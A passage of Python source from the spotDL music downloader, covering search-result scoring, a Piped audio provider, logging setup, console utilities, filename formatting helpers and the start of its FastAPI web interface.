"[%s] Best ISRC result is %s with score %s", song.song_id, best_isrc[0].url, best_isrc[1], ) return best_isrc[0].url results: Dict[Result, float] = {} for options in self.GET_RESULTS_OPTS: # Query YTM by songs only first, this way if we get correct result on the first try # we don't have to make another request search_results = self.get_results(search_query, **options) if only_verified: search_results = [ result for result in search_results if result.verified ] logger.debug( "[%s] Found %s results for search query %s with options %s", song.song_id, len(search_results), search_query, options, ) # Check if any of the search results is in the # first isrc results, since they are not hashable we have to check # by name isrc_result = next( (result for result in search_results if result.url in isrc_urls), None, ) if isrc_result: logger.debug( "[%s] Best ISRC result is %s", song.song_id, isrc_result.url ) return isrc_result.url logger.debug( "[%s] Have to filter results: %s", song.song_id, self.filter_results ) if self.filter_results: # Order results new_results = order_results(search_results, song, self.search_query) else: new_results = {} if len(search_results) > 0: new_results = {search_results[0]: 100.0} logger.debug("[%s] Filtered to %s results", song.song_id, len(new_results)) # song type results are always more accurate than video type, # so if we get score of 80 or above # we are almost 100% sure that this is the correct link if len(new_results) != 0: # get the result with highest score best_result, best_score = self.get_best_result(new_results) logger.debug( "[%s] Best result is %s with score %s", song.song_id, best_result.url, best_score, ) if best_score >= 80 and best_result.verified: logger.debug( "[%s] Returning verified best result %s with score %s", song.song_id, best_result.url, best_score, ) return best_result.url # Update final results with new results results.update(new_results) # No matches found if not results: logger.debug("[%s] No results found", song.song_id) return None # get the result with highest score 
best_result, best_score = self.get_best_result(results) logger.debug( "[%s] Returning best result %s with score %s", song.song_id, best_result.url, best_score, ) return best_result.url def get_best_result(self, results: Dict[Result, float]) -> Tuple[Result, float]: """ Get the best match from the results using views and average match ### Arguments - results: A dictionary of results and their scores ### Returns - The best match URL and its score """ best_results = get_best_matches(results, 8) # If we have only one result, return it if len(best_results) == 1: return best_results[0][0], best_results[0][1] # Initial best result based on the average match best_result = best_results[0] # If the best result has a score higher than 80% # and it's a isrc search, return it if best_result[1] > 80 and best_result[0].isrc_search: return best_result[0], best_result[1] # If we have more than one result, # return the one with the highest score # and most views if len(best_results) > 1: views: List[int] = [] for best_result in best_results: if best_result[0].views: views.append(best_result[0].views) else: views.append(self.get_views(best_result[0].url)) highest_views = max(views) lowest_views = min(views) if highest_views in (0, lowest_views): return best_result[0], best_result[1] weighted_results: List[Tuple[Result, float]] = [] for index, best_result in enumerate(best_results): result_views = views[index] views_score = ( (result_views - lowest_views) / (highest_views - lowest_views) ) * 15 score = min(best_result[1] + views_score, 100) weighted_results.append((best_result[0], score)) # Now we return the result with the highest score return max(weighted_results, key=lambda x: x[1]) return best_result[0], best_result[1] def get_download_metadata(self, url: str, download: bool = False) -> Dict: """ Get metadata for a download using yt-dlp. ### Arguments - url: The url to get metadata for. ### Returns - A dictionary containing the metadata. """ try: data = self.audio_handler.extract_info(url, download=download) if data: return data except Exception as exception: logger.debug(exception) raise AudioProviderError(f"YT-DLP download error - {url}") from exception raise AudioProviderError(f"No metadata found for the provided url {url}") @property def name(self) -> str: """ Get the name of the provider. ### Returns - The name of the provider. """ return self.__class__.__name__ File: spotdl/providers/audio/piped.py """ Piped module for downloading and searching songs. """ import logging import shlex from typing import Any, Dict, List, Optional import requests from yt_dlp import YoutubeDL from spotdl.providers.audio.base import ( ISRC_REGEX, AudioProvider, AudioProviderError, YTDLLogger, ) from spotdl.types.result import Result from spotdl.utils.config import GlobalConfig, get_temp_path from spotdl.utils.formatter import args_to_ytdlp_options __all__ = ["Piped"] logger = logging.getLogger(__name__) HEADERS = { "accept": "*/*", } class Piped(AudioProvider): """ YouTube Music audio provider class """ SUPPORTS_ISRC = True GET_RESULTS_OPTS: List[Dict[str, Any]] = [ {"filter": "music_songs"}, {"filter": "music_videos"}, ] def __init__( # pylint: disable=super-init-not-called self, output_format: str = "mp3", cookie_file: Optional[str] = None, search_query: Optional[str] = None, filter_results: bool = True, yt_dlp_args: Optional[str] = None, ) -> None: """ Pipe audio provider class ### Arguments - output_directory: The directory to save the downloaded songs to. - output_format: The format to save the downloaded songs in. 
- cookie_file: The path to a file containing cookies to be used by YTDL. - search_query: The query to use when searching for songs. - filter_results: Whether to filter results. """ self.output_format = output_format self.cookie_file = cookie_file self.search_query = search_query self.filter_results = filter_results if self.output_format == "m4a": ytdl_format = "best[ext=m4a]/best" elif self.output_format == "opus": ytdl_format = "best[ext=webm]/best" else: ytdl_format = "best" yt_dlp_options = { "format": ytdl_format, "quiet": True, "no_warnings": True, "encoding": "UTF-8", "logger": YTDLLogger(), "cookiefile": self.cookie_file, "outtmpl": f"{get_temp_path()}/%(id)s.%(ext)s", "retries": 5, } if yt_dlp_args: user_options = args_to_ytdlp_options(shlex.split(yt_dlp_args)) yt_dlp_options.update(user_options) self.audio_handler = YoutubeDL(yt_dlp_options) self.session = requests.Session() def get_results(self, search_term: str, **kwargs) -> List[Result]: """ Get results from YouTube Music API and simplify them ### Arguments - search_term: The search term to search for. - kwargs: other keyword arguments passed to the `YTMusic.search` method. ### Returns - A list of simplified results (dicts) """ if kwargs is None: kwargs = {} params = {"q": search_term, **kwargs} if params.get("filter") is None: params["filter"] = "music_videos" response = self.session.get( "https://piped.video/search", params=params, headers=HEADERS, timeout=20, ) if response.status_code != 200: raise AudioProviderError( f"Failed to get results for {search_term} from Piped: {response.text}" ) search_results = response.json() # Simplify results results = [] for result in search_results["items"]: if result["type"] != "stream": continue isrc_result = ISRC_REGEX.search(search_term) results.append( Result( source="piped", url=f"https://piped.video{result['url']}", verified=kwargs.get("filter") == "music_songs", name=result["title"], duration=result["duration"], author=result["uploaderName"], result_id=result["url"].split("?v=")[1], artists=( (result["uploaderName"],) if kwargs.get("filter") == "music_songs" else None ), isrc_search=isrc_result is not None, search_query=search_term, ) ) return results def get_download_metadata(self, url: str, download: bool = False) -> Dict: """ Get metadata for a download using yt-dlp. ### Arguments - url: The url to get metadata for. ### Returns - A dictionary containing the metadata. 
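        For illustration, the synthetic info dict handed to yt-dlp's
        `process_video_result` below is shaped roughly like this (all values
        are made up):

        ```python
        {
            "title": "Some Track",
            "id": "dQw4w9WgXcQ",
            "view_count": 123456,
            "extractor": "Generic",
            "formats": [
                {"url": "https://example.com/audio.webm", "ext": "webm", "abr": "128", "filesize": 3145728},
            ],
        }
        ```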
""" url_id = url.split("?v=")[1] piped_response = requests.get( f"https://piped.video/streams/{url_id}", timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ) if piped_response.status_code != 200: raise AudioProviderError( f"Failed to get metadata for {url} from Piped: {piped_response.text}" ) piped_data = piped_response.json() yt_dlp_json = { "title": piped_data["title"], "id": url_id, "view_count": piped_data["views"], "extractor": "Generic", "formats": [], } for audio_stream in piped_data["audioStreams"]: yt_dlp_json["formats"].append( { "url": audio_stream["url"], "ext": "webm" if audio_stream["codec"] == "opus" else "m4a", "abr": audio_stream["quality"].split(" ")[0], "filesize": audio_stream["contentLength"], } ) return self.audio_handler.process_video_result(yt_dlp_json, download=download) File: spotdl/utils/logging.py """ Module for logging """ import logging from typing import Optional from rich import get_console from rich.console import ConsoleRenderable from rich.logging import RichHandler from rich.markup import escape from rich.text import Text from rich.theme import Theme from rich.traceback import install __all__ = [ "CRITICAL", "FATAL", "ERROR", "WARNING", "WARN", "INFO", "DEBUG", "MATCH", "NOTSET", "init_logging", "SpotdlFormatter", "LEVEL_TO_NAME", "NAME_TO_LEVEL", ] # https://github.com/python/cpython/blob/3.10/Lib/logging/__init__.py CRITICAL = 50 FATAL = CRITICAL ERROR = 40 WARNING = 30 WARN = WARNING INFO = 20 DEBUG = 10 MATCH = 5 NOTSET = 0 LEVEL_TO_NAME = { CRITICAL: "CRITICAL", ERROR: "ERROR", WARNING: "WARNING", INFO: "INFO", MATCH: "MATCH", DEBUG: "DEBUG", NOTSET: "NOTSET", } NAME_TO_LEVEL = { "CRITICAL": CRITICAL, "FATAL": FATAL, "ERROR": ERROR, "WARN": WARNING, "WARNING": WARNING, "INFO": INFO, "MATCH": MATCH, "DEBUG": DEBUG, "NOTSET": NOTSET, } THEME = Theme( { "bar.back": "grey23", "bar.complete": "rgb(165,66,129)", "bar.finished": "rgb(114,156,31)", "bar.pulse": "rgb(165,66,129)", "general": "green", "nonimportant": "rgb(40,100,40)", "progress.data.speed": "red", "progress.description": "none", "progress.download": "green", "progress.filesize": "green", "progress.filesize.total": "green", "progress.percentage": "green", "progress.remaining": "rgb(40,100,40)", "logging.level.debug": "blue", "logging.level.info": "green", "logging.level.warning": "yellow", "logging.level.error": "red", "logging.level.critical": "bold red", } ) class SpotdlFormatter(logging.Formatter): """ A custom logger for spotdl. """ def format(self, record: logging.LogRecord) -> str: """ Format a log record. """ result = escape(super().format(record)) msg = result if record.levelno == DEBUG: msg = f"[blue]{result}" if record.levelno == MATCH: msg = f"[magenta]{result}" if record.levelno == INFO: msg = f"[green]{result}" if record.levelno == WARNING: msg = f"[yellow]{result}" if record.levelno == ERROR: msg = f"[red]{result}" if record.levelno == CRITICAL: msg = f"[bold red]{result}" return msg class SpotdlHandler(RichHandler): """ A custom logging handler for spotdl. In this case, it's just a wrapper around the rich handler. To not highlight keywords in info messages """ def render_message( self, record: logging.LogRecord, message: str ) -> "ConsoleRenderable": """Render message text in to Text. ### Arguments - record: logging Record. - message: String containing log message. ### Returns - ConsoleRenderable: Renderable to display log message. 
""" use_markup = getattr(record, "markup", self.markup) message_text = Text.from_markup(message) if use_markup else Text(message) highlighter = getattr(record, "highlighter", self.highlighter) # Don't highlight info messages if highlighter and record.levelno != INFO: message_text = highlighter(message_text) if not hasattr(self, "keywords"): self.keywords = self.KEYWORDS # Don't highlight keywords in info messages if self.keywords and record.levelno != INFO: message_text.highlight_words(self.keywords, "logging.keyword") return message_text def init_logging(log_level: str, log_format: Optional[str] = None): """ Initialize logging for spotdl. ### Arguments - `console`: The console to use. - `log_level`: The log level to use. """ # Don't log too much logging.getLogger("requests").setLevel(logging.WARNING) logging.getLogger("urllib3").setLevel(logging.WARNING) logging.getLogger("spotipy").setLevel(logging.WARNING) logging.getLogger("asyncio").setLevel(logging.WARNING) logging.getLogger("syncedlyrics").setLevel(logging.WARNING) logging.getLogger("bandcamp_api").setLevel(logging.WARNING) logging.getLogger("beautifulsoup4").setLevel(logging.WARNING) logging.getLogger("pytube").setLevel(logging.ERROR) # Create console console = get_console() console.push_theme(THEME) # Add matching level loggers logging.addLevelName(MATCH, "MATCH") # Create a rich handler rich_handler = SpotdlHandler( show_time=log_level == "DEBUG", log_time_format="[%X]", omit_repeated_times=False, console=console, level=log_level, markup=True, show_path=log_level == "DEBUG", show_level=log_level == "DEBUG", rich_tracebacks=True, ) msg_format = "%(message)s" if log_format is None: if log_level == "DEBUG": msg_format = "%(threadName)s - %(message)s" else: msg_format = log_format # Add rich handler to spotdl logger rich_handler.setFormatter(SpotdlFormatter(msg_format)) # Create spotdl logger spotdl_logger = logging.getLogger("spotdl") # Setup spotdl logger spotdl_logger.setLevel(log_level) spotdl_logger.addHandler(rich_handler) # Install rich traceback handler install(show_locals=False, extra_lines=1, console=console) File: spotdl/utils/console.py """ Module for holding console related actions. """ import json import sys from spotdl.utils.config import DEFAULT_CONFIG, get_config_file from spotdl.utils.ffmpeg import download_ffmpeg as ffmpeg_download from spotdl.utils.ffmpeg import get_local_ffmpeg, is_ffmpeg_installed from spotdl.utils.github import check_for_updates as get_update_status __all__ = [ "is_frozen", "is_executable", "generate_initial_config", "generate_config", "check_for_updates", "download_ffmpeg", "ACTIONS", ] def is_frozen(): """ Check if the application is frozen. ### Returns - `True` if the application is frozen, `False` otherwise. """ return getattr(sys, "frozen", False) def is_executable(): """ Check if the application is an prebuilt executable. And has been launched with double click. ### Returns - `True` if the application is an prebuilt executable, `False` otherwise. """ return is_frozen() and len(sys.argv) == 1 def generate_initial_config(): """ Generate the initial config file if it doesn't exist. """ if get_config_file().is_file() is False: config_path = get_config_file() with open(config_path, "w", encoding="utf-8") as config_file: json.dump(DEFAULT_CONFIG, config_file, indent=4) def generate_config(): """ Generate the config file if it doesn't exist This is done before the argument parser so it doesn't requires `operation` and `query` to be passed. 
""" config_path = get_config_file() if config_path.exists(): overwrite_config = input("Config file already exists. Overwrite? (y/N): ") if overwrite_config.lower() != "y": print("Exiting...") return None with open(config_path, "w", encoding="utf-8") as config_file: json.dump(DEFAULT_CONFIG, config_file, indent=4) print(f"Config file generated at {config_path}") return None def check_for_updates(): """ Check for updates to the current version. """ version_message = get_update_status() print(version_message) def download_ffmpeg(): """ Handle ffmpeg download process and print the result. """ if get_local_ffmpeg() is not None or is_ffmpeg_installed(): overwrite_ffmpeg = input( "FFmpeg is already installed. Do you want to overwrite it? (y/N): " ) if overwrite_ffmpeg.lower() == "y": local_ffmpeg = ffmpeg_download() if local_ffmpeg.is_file(): print(f"FFmpeg successfully downloaded to {local_ffmpeg.absolute()}") else: print("FFmpeg download failed") else: print("Downloading FFmpeg...") download_path = ffmpeg_download() if download_path.is_file(): print(f"FFmpeg successfully downloaded to {download_path.absolute()}") else: print("FFmpeg download failed") ACTIONS = { "--generate-config": generate_config, "--check-for-updates": check_for_updates, "--download-ffmpeg": download_ffmpeg, } File: spotdl/utils/formatter.py """ Module for formatting songs into strings. Contains functions to create search queries and song titles and file names. """ import copy import logging import re from functools import lru_cache from pathlib import Path from typing import Any, Dict, List, Optional from unicodedata import normalize import pykakasi from rapidfuzz import fuzz from slugify import slugify as py_slugify from yt_dlp.options import create_parser from yt_dlp.options import optparse as yt_dlp_optparse from yt_dlp.utils import sanitize_filename from spotdl.types.song import Song __all__ = [ "VARS", "JAP_REGEX", "DISALLOWED_REGEX", "create_song_title", "sanitize_string", "slugify", "format_query", "create_search_query", "create_file_name", "parse_duration", "to_ms", "restrict_filename", "ratio", "smart_split", "create_path_object", "args_to_ytdlp_options", ] VARS = [ "{title}", "{artists}", "{artist}", "{album}", "{album-artist}", "{genre}", "{disc-number}", "{disc-count}", "{duration}", "{year}", "{original-date}", "{track-number}", "{tracks-count}", "{isrc}", "{track-id}", "{publisher}", "{list-length}", "{list-position}", "{list-name}", "{output-ext}", ] KKS = pykakasi.kakasi() JAP_REGEX = re.compile( "[\u3000-\u303f\u3040-\u309f\u30a0-\u30ff\uff00-\uff9f\u4e00-\u9faf\u3400-\u4dbf]" ) DISALLOWED_REGEX = re.compile(r"[^-a-zA-Z0-9\!\@\$]+") YT_DLP_PARSER = create_parser() logger = logging.getLogger(__name__) def create_song_title(song_name: str, song_artists: List[str]) -> str: """ Create the song title. ### Arguments - song_name: the name of the song - song_artists: the list of artists of the song ### Returns - the song title ### Notes - Example: "Artist1, Artist2 - Song Name" """ joined_artists = ", ".join(song_artists) if len(song_artists) >= 1: return f"{joined_artists} - {song_name}" return song_name def sanitize_string(string: str) -> str: """ Sanitize the filename to be used in the file system. 
### Arguments - string: the string to sanitize ### Returns - the sanitized string """ output = string # this is windows specific (disallowed chars) output = "".join(char for char in output if char not in "/?\\*|<>") # double quotes (") and semi-colons (:) are also disallowed characters but we would # like to retain their equivalents, so they aren't removed in the prior loop output = output.replace('"', "'").replace(":", "-") return output @lru_cache() def slugify(string: str) -> str: """ Slugify the string. ### Arguments - string: the string to slugify ### Returns - the slugified string """ # Replace ambiguous characters if not JAP_REGEX.search(string): # If string doesn't have japanese characters # return early return py_slugify(string, regex_pattern=DISALLOWED_REGEX.pattern) # Workaround for japanese characters # because slugify incorrectly converts them # to latin characters normal_slug = py_slugify( string, regex_pattern=JAP_REGEX.pattern, ) results = KKS.convert(normal_slug) result = "" for index, item in enumerate(results): result += item["hepburn"] if not ( item["kana"] == item["hepburn"] or item["kana"] == item["hepburn"] or ( item == results[-1] or results[index + 1]["kana"] == results[index + 1]["hepburn"] ) ): result += "-" return py_slugify(result, regex_pattern=DISALLOWED_REGEX.pattern) def format_query( song: Song, template: str, santitize: bool, file_extension: Optional[str] = None, short: bool = False, ) -> str: """ Replace template variables with the actual values. ### Arguments - song: the song object - template: the template string - santitize: whether to sanitize the string - file_extension: the file extension to use - short: whether to use the short version of the template ### Returns - the formatted string """ if "{output-ext}" in template and file_extension is None: raise ValueError("file_extension is None, but template contains {output-ext}") for key, val in [ ("{list-length}", song.list_length), ("{list-position}", song.list_position), ("{list-name}", song.list_name), ]: if not (key in template and val is None): continue logger.warning( "Template contains %s, but it's value is None. 
Replacing with empty string.", key, ) template = template.replace(key, "") template = template.replace(r"//", r"/") # If template has only {output-ext}, fix it if template in ["/.{output-ext}", ".{output-ext}"]: template = "{artists} - {title}.{output-ext}" # Remove artists from the list that are already in the title if short: artists = [ artist for artist in song.artists if slugify(artist) not in slugify(song.name) ] # Add the main artist again to the list if len(artists) == 0 or artists[0] != song.artists[0]: artists.insert(0, song.artists[0]) else: artists = song.artists artists_str = ", ".join(artists) # the code below is valid, song_list is actually checked for None formats = { "{title}": song.name, "{artists}": song.artists[0] if short is True else artists_str, "{artist}": song.artists[0], "{album}": song.album_name, "{album-artist}": song.album_artist, "{genre}": song.genres[0] if song.genres else "", "{disc-number}": song.disc_number, "{disc-count}": song.disc_count, "{duration}": song.duration, "{year}": song.year, "{original-date}": song.date, "{track-number}": f"{int(song.track_number):02d}" if song.track_number else "", "{tracks-count}": song.tracks_count, "{isrc}": song.isrc, "{track-id}": song.song_id, "{publisher}": song.publisher, "{output-ext}": file_extension, "{list-name}": song.list_name, "{list-position}": str(song.list_position).zfill(len(str(song.list_length))), "{list-length}": song.list_length, } if santitize: # sanitize the values in formats dict for key, value in formats.items(): if value is None: continue formats[key] = sanitize_string(str(value)) # Replace all the keys with the values for key, value in formats.items(): template = template.replace(key, str(value)) return template def create_search_query( song: Song, template: str, santitize: bool, file_extension: Optional[str] = None, short: bool = False, ) -> str: """ Create the search query for the song. ### Arguments - song: the song object - template: the template string - santitize: whether to sanitize the string - file_extension: the file extension to use - short: whether to use the short version of the template ### Returns - the formatted string """ # If template does not contain any of the keys, # append {artist} - {title} at the beginning of the template if not any(key in template for key in VARS): template = "{artist} - {title}" + template return format_query(song, template, santitize, file_extension, short=short) def create_file_name( song: Song, template: str, file_extension: str, restrict: Optional[str] = None, short: bool = False, file_name_length: Optional[int] = None, ) -> Path: """ Create the file name for the song, by replacing template variables with the actual values. ### Arguments - song: the song object - template: the template string - file_extension: the file extension to use - restrict: sanitization to apply to the filename - short: whether to use the short version of the template - file_name_length: the maximum length of the file name ### Returns - the formatted string as a Path object """ temp_song = copy.deepcopy(song) # If template does not contain any of the keys, # append {artists} - {title}.{output-ext} to it if not any(key in template for key in VARS) and template != "": template += "/{artists} - {title}.{output-ext}" if template == "": template = "{artists} - {title}.{output-ext}" # If template ends with a slash. 
Does not have a file name with extension # at the end of the template, append {artists} - {title}.{output-ext} to it if template.endswith("/") or template.endswith(r"\\") or template.endswith("\\\\"): template += "/{artists} - {title}.{output-ext}" # If template does not end with {output-ext}, append it to the end of the template if not template.endswith(".{output-ext}"): template += ".{output-ext}" formatted_string = format_query( song=song, template=template, santitize=True, file_extension=file_extension, short=short, ) file = create_path_object(formatted_string) length_limit = file_name_length or 255 # Check if the file name length is greater than the limit if len(file.name) < length_limit: # Restrict the filename if needed if restrict and restrict != "none": return restrict_filename(file, restrict == "strict") return file if short is False: return create_file_name( song, template, file_extension, restrict=restrict, short=True, file_name_length=length_limit, ) non_template_chars = re.findall(r"(?<!{)[^{}]+(?![^{}]*})", template) half_length = int((length_limit * 0.50) - (len("".join(non_template_chars)) / 2)) # Path template is already short, but we still can't create a file # so we reduce it even further is_long_artist = len(temp_song.artist) > half_length is_long_title = len(temp_song.name) > half_length path_separator = "/" if "/" in template else "\\" name_template_parts = template.rsplit(path_separator, 1) name_template = ( name_template_parts[1] if len(name_template_parts) > 1 else name_template_parts[0] ) if is_long_artist: logger.warning( "%s: Song artist is too long. Using only part of song artist.", temp_song.display_name, ) temp_song.artist = smart_split(temp_song.artist, half_length, None) temp_song.artists = [temp_song.artist] if is_long_title: logger.warning( "%s: File name is too long. Using only part of the song title.", temp_song.display_name, ) temp_song.name = smart_split(temp_song.name, half_length, None) new_file = create_path_object( format_query( song=temp_song, template=name_template, santitize=True, file_extension=file_extension, short=short, ) ) if len(new_file.name) > length_limit: logger.warning( "File name is still too long. " "Using default file name with shortened artist and title." ) if template == "{artist} - {title}.{output-ext}": raise ValueError( "File name is still too long, " "but the template is already short. " "Please try other template, " "increase the file name length limit." ) return create_file_name( temp_song, "{artist} - {title}.{output-ext}", file_extension, restrict=restrict, short=True, file_name_length=length_limit, ) return new_file def parse_duration(duration: Optional[str]) -> float: """ Convert string value of time (duration: "25:36:59") to a float value of seconds (92219.0) ### Arguments - duration: the string value of time ### Returns - the float value of seconds """ if duration is None: return 0.0 try: # {(1, "s"), (60, "m"), (3600, "h")} mapped_increments = zip([1, 60, 3600], reversed(duration.split(":"))) seconds = sum(multiplier * int(time) for multiplier, time in mapped_increments) return float(seconds) # This usually occurs when the wrong string is mistaken for the duration except (ValueError, TypeError, AttributeError): return 0.0 def to_ms( string: Optional[str] = None, precision: Optional[int] = None, **kwargs ) -> float: """ Convert a string to milliseconds. 
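    A worked example using the keyword form (values are arbitrary):

    ```python
    to_ms(hour=1, min=2, sec=3, ms=4)
    # -> 3723004  (1 h + 2 min + 3 s + 4 ms, expressed in milliseconds)
    ```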
### Arguments - string: the string to convert - precision: the number of decimals to round to - kwargs: the keyword args to convert ### Returns - the milliseconds ### Notes - You can either pass a string, - or a set of keyword args ("hour", "min", "sec", "ms") to convert. - If "precision" is set, the result is rounded to the number of decimals given. - From: https://gist.github.com/Hellowlol/5f8545e999259b4371c91ac223409209 """ if string: hour = int(string[0:2]) minute = int(string[3:5]) sec = int(string[6:8]) milliseconds = int(string[10:11]) else: hour = int(kwargs.get("hour", 0)) minute = int(kwargs.get("min", 0)) sec = int(kwargs.get("sec", 0)) milliseconds = int(kwargs.get("ms", 0)) result = ( (hour * 60 * 60 * 1000) + (minute * 60 * 1000) + (sec * 1000) + milliseconds ) if precision and isinstance(precision, int): return round(result, precision) return result def restrict_filename(pathobj: Path, strict: bool = True) -> Path: """ Sanitizes the filename part of a Path object. Returns modified object. ### Arguments - pathobj: the Path object to sanitize - strict: whether sanitization should be strict ### Returns - the modified Path object ### Notes - Based on the `sanitize_filename` function from yt-dlp """ if strict: result = sanitize_filename(pathobj.name, True, False) # type: ignore result = result.replace("_-_", "-") else: result = ( normalize("NFKD", pathobj.name).encode("ascii", "ignore").decode("utf-8") ) if not result: result = "_" return pathobj.with_name(result) @lru_cache() def ratio(string1: str, string2: str) -> float: """ Wrapper for fuzz.ratio with lru_cache ### Arguments - string1: the first string - string2: the second string ### Returns - the ratio """ return fuzz.ratio(string1, string2) def smart_split( string: str, max_length: int, separators: Optional[List[str]] = None ) -> str: """ Split a string into a list of strings with a maximum length of max_length. Stops at the first separator that produces a string with a length less than max_length. ### Arguments - string: the string to split - max_length: the maximum length of string - separators: the separators to split the string with ### Returns - the new string """ if separators is None: separators = ["-", ",", " ", ""] for separator in separators: parts = string.split(separator if separator != "" else None) new_string = separator.join(parts[:1]) for part in parts[1:]: if len(new_string) + len(separator) + len(part) > max_length: break new_string += separator + part if len(new_string) <= max_length: return new_string return string[:max_length] def create_path_object(string: str) -> Path: """ Create a Path object from a string. Sanitizes the filename part of the Path object. ### Arguments - string: the string to convert ### Returns - the Path object """ # Parse template as Path object file = Path(string) santitized_parts = [] for part in file.parts: match = re.search(r"[^\.*](.*)[^\.*$]", part) if match and part != ".spotdl": santitized_parts.append(match.group(0)) else: santitized_parts.append(part) # Join the parts of the path return Path(*santitized_parts) def args_to_ytdlp_options( argument_list: List[str], defaults: Optional[Dict[str, Any]] = None ) -> Dict[str, Any]: """ Convert a list of arguments to a dictionary of options. 
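    This mirrors how the audio providers merge user-supplied `--yt-dlp-args`
    into their base yt-dlp options (the flags below are just examples of valid
    yt-dlp CLI switches):

    ```python
    import shlex

    base = {"format": "bestaudio", "quiet": True}
    merged = args_to_ytdlp_options(shlex.split("--force-ipv4 --socket-timeout 10"), base)
    # `merged` now holds the base options plus the parsed yt-dlp flags
    ```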
### Arguments - argument_list: the list of arguments - defaults: the default options ### Returns - the dictionary of options """ new_args = YT_DLP_PARSER.parse_args(argument_list, yt_dlp_optparse.Values(defaults)) return vars(new_args[0]) File: spotdl/utils/web.py """ Module which contains the web server related function FastAPI routes/classes etc. """ import argparse import asyncio import logging import mimetypes import os import shutil from argparse import Namespace from pathlib import Path from typing import Any, Dict, List, Optional, Union from fastapi import ( APIRouter, Depends, FastAPI, HTTPException, Query, Response, WebSocket, WebSocketDisconnect, ) from fastapi.responses import FileResponse from fastapi.staticfiles import StaticFiles from starlette.types import Scope from uvicorn import Server from spotdl._version import __version__ from spotdl.download.downloader import Downloader from spotdl.download.progress_handler import ProgressHandler, SongTracker from spotdl.types.album import Album from spotdl.types.artist import Artist from spotdl.types.options import ( DownloaderOptionalOptions, DownloaderOptions, WebOptions, ) from spotdl.types.playlist import Playlist from spotdl.types.song import Song from spotdl.utils.arguments import create_parser from spotdl.utils.config import ( DOWNLOADER_OPTIONS, create_settings_type, get_spotdl_path, ) from spotdl.utils.github import RateLimitError, get_latest_version, get_status from spotdl.utils.search import get_search_results __all__ = [ "ALLOWED_ORIGINS", "SPAStaticFiles", "Client", "ApplicationState", "router", "app_state", "get_current_state", "get_client", "websocket_endpoint", "song_from_url", "query_search", "download_url", "download_file", "get_settings", "update_settings", "fix_mime_types", ] ALLOWED_ORIGINS = [ "http://localhost:8800", "http://127.0.0.1:8800", "https://localhost:8800", "https://127.0.0.1:8800", ] class SPAStaticFiles(StaticFiles): """ Override the static files to serve the index.html and other assets. """ async def get_response(self, path: str, scope: Scope) -> Response: """ Serve static files from the SPA. ### Arguments - path: The path to the file. - scope: The scope of the request. ### Returns - returns the response. """ response = await super().get_response(path, scope) if response.status_code == 404: response = await super().get_response(".", scope) response.headers.setdefault( "Cache-Control", "max-age=0, no-cache, no-store, , must-revalidate" ) response.headers.setdefault("Pragma", "no-cache") response.headers.setdefault("Expires", "0") return response class Client: """ Holds the client's state. """ def __init__( self, websocket: WebSocket, client_id: str, ): """ Initialize the WebSocket handler. ### Arguments - websocket: The WebSocket instance. - client_id: The client's ID. - downloader_settings: The downloader settings. """ self.downloader_settings = DownloaderOptions( **create_settings_type( Namespace(config=False), dict(app_state.downloader_settings), DOWNLOADER_OPTIONS, ) # type: ignore ) self.websocket = websocket self.client_id = client_id self.downloader = Downloader( settings=self.downloader_settings, loop=app_state.loop ) self.downloader.progress_handler.web_ui = True async def connect(self): """ Called when a new client connects to the websocket. 
""" await self.websocket.accept() # Add the connection to the list of connections app_state.clients[self.client_id] = self app_state.logger.info("Client %s connected", self.client_id) async def send_update(self, update: Dict[str, Any]): """ Send an update to the client. ### Arguments - update: The update to send. """ await self.websocket.send_json(update) def song_update(self, progress_handler: SongTracker, message: str): """ Called when a song updates. ### Arguments - progress_handler: The progress handler. - message: The message to send. """ update_message = { "song": progress_handler.song.json, "progress": progress_handler.progress, "message": message, } asyncio.run_coroutine_threadsafe( self.send_update(update_message), app_state.loop ) @classmethod def get_instance(cls, client_id: str) -> Optional["Client"]: """ Get the WebSocket instance for a client. ### Arguments - client_id: The client's ID. ### Returns - returns the WebSocket instance. """ instance = app_state.clients.get(client_id) if instance: return instance app_state.logger.error("Client %s not found", client_id) return None class ApplicationState: """ Class that holds the application state. """ api: FastAPI server: Server loop: asyncio.AbstractEventLoop web_settings: WebOptions downloader_settings: DownloaderOptions clients: Dict[str, Client] = {} logger: logging.Logger router = APIRouter() app_state: ApplicationState = ApplicationState() def get_current_state() -> ApplicationState: """ Get the current state of the application. ### Returns - returns the application state. """ return app_state def get_client(client_id: Union[str, None] = Query(default=None)) -> Client: """ Get the client's state. ### Arguments - client_id: The client's ID. ### Returns - returns the client's state. """ if client_id is None: raise HTTPException(status_code=400, detail="client_id is required") instance = Client.get_instance(client_id) if instance is None: raise HTTPException(status_code=404, detail="client not found") return instance @router.websocket("/api/ws") async def websocket_endpoint(websocket: WebSocket, client_id: str): """ Websocket endpoint. ### Arguments - websocket: The WebSocket instance. """ await Client(websocket, client_id).connect() try: while True: await websocket.receive_json() except WebSocketDisconnect: app_state.clients.pop(client_id, None) if ( len(app_state.clients) == 0 and app_state.web_settings["keep_alive"] is False ): app_state.logger.debug( "No active connections, waiting 1s before shutting down" ) await asyncio.sleep(1) # Wait 1 second before shutting down # This is to prevent the server from shutting down when a client # disconnects and reconnects quickly (e.g. when refreshing the page) if len(app_state.clients) == 0: # Perform a clean exit app_state.logger.info("Shutting down server, no active connections") app_state.server.force_exit = True app_state.server.should_exit = True await app_state.server.shutdown() # Deprecated @router.get("/api/song/url", response_model=None) def song_from_url(url: str) -> Song: """ Search for a song on spotify using url. ### Arguments - url: The url to search. ### Returns - returns the first result as a Song object. """ return Song.from_url(url) @router.get("/api/url", response_model=None) def songs_from_url(url: str) -> List[Song]: """ Search for a song, playlist, artist or album on spotify using url. ### Arguments - url: The url to search. ### Returns - returns a list with Song objects to be downloaded. 
